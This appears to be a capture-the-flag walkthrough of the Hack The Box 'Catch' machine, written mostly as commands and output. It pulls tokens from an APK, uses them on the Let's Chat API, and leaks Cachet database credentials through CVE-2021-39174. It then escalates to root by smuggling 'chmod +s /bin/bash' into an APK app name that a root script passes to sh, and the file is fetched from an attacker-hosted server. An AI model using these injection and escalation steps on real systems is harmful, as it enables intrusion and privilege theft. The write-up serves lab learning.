# Install apk we can see a subdomain

`https://status.catch.htb/`

# Reversing apk with mobsf some tokens
```
"gitea_token" : "b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0"
"lets_chat_token" : "NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ=="
"slack_token" : "xoxp-23984754863-2348975623103"
```

# Enum API let's chat

```
GET /rooms HTTP/1.1
Host: 10.129.138.206:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"a3f-LGZojnqlQ0kS8cyg/ENKiF1EEuE"
Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==
```

```
[{"id":"61b86b28d984e2451036eb17","slug":"status","name":"Status","description":"Cachet Updates and Maintenance","lastActive":"2021-12-14T10:34:20.749Z","created":"2021-12-14T10:00:08.384Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]},{"id":"61b8708efe190b466d476bfb","slug":"android_dev","name":"Android Development","description":"Android App Updates, Issues & More","lastActive":"2021-12-14T10:24:21.145Z","created":"2021-12-14T10:23:10.474Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]},{"id":"61b86b3fd984e2451036eb18","slug":"employees","name":"Employees","description":"New Joinees, Org updates","lastActive":"2021-12-14T10:18:04.710Z","created":"2021-12-14T10:00:31.043Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]}]
```

`GET /account`
```
{"id":"61b86aead984e2451036eb16","firstName":"Administrator","lastName":"NA","username":"admin","displayName":"Admin","avatar":"e2b5310ec47bba317c5f1b5889e96f04","openRooms":["61b86b28d984e2451036eb17","61b86b3fd984e2451036eb18","61b8708efe190b466d476bfb"]}
```

`GET /users`
```
[{"id":"61b86aead984e2451036eb16","firstName":"Administrator","lastName":"NA","username":"admin","displayName":"Admin","avatar":"e2b5310ec47bba317c5f1b5889e96f04","openRooms":["61b86b28d984e2451036eb17","61b86b3fd984e2451036eb18","61b8708efe190b466d476bfb"]},{"id":"61b86dbdfe190b466d476bf0","firstName":"John","lastName":"Smith","username":"john","displayName":"John","avatar":"f5504305b704452bba9c94e228f271c4","openRooms":["61b86b3fd984e2451036eb18","61b86b28d984e2451036eb17"]},{"id":"61b86e40fe190b466d476bf2","firstName":"Will","lastName":"Robinson","username":"will","displayName":"Will","avatar":"7c6143461e935a67981cc292e53c58fc","openRooms":["61b86b3fd984e2451036eb18","61b86b28d984e2451036eb17"]},{"id":"61b86f15fe190b466d476bf5","firstName":"Lucas","lastName":"NA","username":"lucas","displayName":"Lucas","avatar":"b36396794553376673623dc0f6dec9bb","openRooms":["61b86b28d984e2451036eb17","61b86b3fd984e2451036eb18"]}]
```

`GET /rooms/61b86b28d984e2451036eb17/messages`
```
{"id":"61b8702dfe190b466d476bfa","text":"Here are the credentials `john :  E}V!mywu_69T4C}W`","posted":"2021-12-14T10:21:33.859Z","owner":"61b86f15fe190b466d476bf5","room":"61b86b28d984e2451036eb17"},
```

# Login Cachet app

`http://10.129.138.206:8000/auth/login`

```
john : E}V!mywu_69T4C}W
```

# CVE-2021-39174 - Configuration Leak

Go to settings/mail

`http://10.129.138.206:8000/dashboard/settings/mail`

Modify values

```
Mail Driver: SMTP
Mail Host (optional): 
Mail From Address: ${DB_USERNAME}:${DB_PASSWORD}
Mail Username: 
Mail Password: 
```

- Save changes
- Clic on Test
- You will see an error page go to again settings/mail

`http://10.129.138.206:8000/dashboard/settings/mail`

```
Mail From Address
will:s2#4Fg0_%3!
```

# SSH CONNECTION

`ssh will@10.129.138.206`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Catch]
└─# ssh will@10.129.138.206                         
will@10.129.138.206's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-104-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 16 Mar 2022 09:28:19 PM UTC

  System load:                      0.0
  Usage of /:                       74.8% of 16.61GB
  Memory usage:                     84%
  Swap usage:                       32%
  Processes:                        450
  Users logged in:                  0
  IPv4 address for br-535b7cf3a728: 172.18.0.1
  IPv4 address for br-fe1b5695b604: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.129.138.206
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:b4cd


0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Mar 16 21:21:56 2022 from 10.10.14.57
will@catch:~$ id
uid=1000(will) gid=1000(will) groups=1000(will)
will@catch:~$ cat user.txt 
1aed3c896f17ff3a65baab903665835a
```

# Priv Esc

```
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls                                                                               
# file: /opt/mdm                                                                                                                                 
USER   root      rwx     
user   will      r-x     
GROUP  root      r-x     
mask             r-x     
other            --x     

# file: /opt/mdm/apk_bin
USER   root      rwx     
user   will      rwx     
GROUP  root      r-x     
mask             rwx     
other            --x     

# file: /opt/mdm/verify.sh
USER   root      rwx     
user   will      r-x     
GROUP  root      r-x     
mask             r-x     
other            --x
```

# Part of code vuln verify.sh

```bash
app_check() {
        APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
        echo $APP_NAME
        if [[ $APP_NAME == *"Catch"* ]]; then
                echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
                mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
        else
                echo "[!] App doesn't belong to Catch Global"
                cleanup
                exit
        fi
}
```

# We can modify strings.xml file to get rce

`java -jar apktool_2.6.1.jar d catchv1.0.apk`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Catch]
└─# java -jar apktool_2.6.1.jar d catchv1.0.apk                                                              
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
I: Using Apktool 2.6.1 on catchv1.0.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
```

`catchv1.0/res/values/strings.xml`
```
<string name="app_name">Catch;chmod +s /bin/bash;</string>
```

`java -jar apktool_2.6.1.jar b catchv1.0`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Catch]
└─# java -jar apktool_2.6.1.jar b catchv1.0    
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
I: Using Apktool 2.6.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...
```

`mv catchv1.0/dist/catchv1.0.apk a.apk`

# Make key to sign apk

`keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000`

# Signning apk

`jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore a.apk alias_name`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Catch]
└─# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore a.apk alias_name
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Enter Passphrase for keystore: 
   adding: META-INF/MANIFEST.MF
   adding: META-INF/ALIAS_NA.SF
   adding: META-INF/ALIAS_NA.RSA
  signing: AndroidManifest.xml
  signing: res/drawable-mdpi/abc_ic_commit_search_api_mtrl_alpha.png
  signing: res/drawable-mdpi/notify_panel_notification_icon_bg.png
  signing: res/drawable-mdpi/notification_bg_low_normal.9.png
```

# Send file to victim

- `python3 -m http.server 80`
- `cd /opt/mdm/apk_bin`
- `wget 10.10.14.57/a.apk`

# Just wait until execute script

```
2022/03/17 00:51:18 CMD: UID=0    PID=207499 | /bin/bash /opt/mdm/verify.sh 
2022/03/17 00:51:18 CMD: UID=0    PID=207502 | xargs -I {} sh -c mkdir {} 
2022/03/17 00:51:18 CMD: UID=0    PID=207503 | sh -c mkdir Catch;chmod +s /bin/bash; 
2022/03/17 00:51:18 CMD: UID=0    PID=207505 | chmod +s /bin/bash
```

# Shell as root

`/bin/bash -p`

```
will@catch:/opt/mdm/apk_bin$ /bin/bash -p
bash-5.0# id
uid=1000(will) gid=1000(will) euid=0(root) egid=0(root) groups=0(root),1000(will)
bash-5.0# cat /root/root.txt
16a088154595f8912477e4c98b004e72
bash-5.0#
```

# Referencias
https://github.com/sdelements/lets-chat/wiki/API \
https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection \
https://github.com/iBotPeaches/Apktool/issues/2149